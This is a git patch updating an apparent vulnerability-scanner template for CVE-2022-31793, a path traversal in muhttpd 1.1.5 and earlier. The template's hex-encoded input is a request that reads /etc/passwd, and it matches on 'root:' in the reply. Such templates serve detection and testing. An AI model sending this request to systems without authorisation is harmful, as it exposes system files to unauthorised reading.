From 44ccfbf7b2dd695cbb14a8b02d7597e23e9f76e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 4 Aug 2022 18:59:59 +0400 Subject: [PATCH] Update CVE-2022-31793.yaml --- cves/2022/CVE-2022-31793.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-31793.yaml b/cves/2022/CVE-2022-31793.yaml index 08b7b73a39..2c9b650e48 100644 --- a/cves/2022/CVE-2022-31793.yaml +++ b/cves/2022/CVE-2022-31793.yaml @@ -3,18 +3,21 @@ id: CVE-2022-31793 info: name: muhttpd <= 1.1.5 - Path traversal author: scent2d - severity: unknown + severity: high description: | A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system. reference: - https://derekabdine.com/blog/2022-arris-advisory.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793 - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 - tags: cve,cve2022,muhttpd,lfi,unauth + metadata: + verified: true + tags: cve,cve2022,network,muhttpd,lfi,unauth network: - host: - "{{Hostname}}" + inputs: - data: "47455420612F6574632F706173737764" type: hex @@ -23,7 +26,7 @@ network: read-size: 128 matchers: - type: word + part: body encoding: hex words: - "726f6f743a" - part: body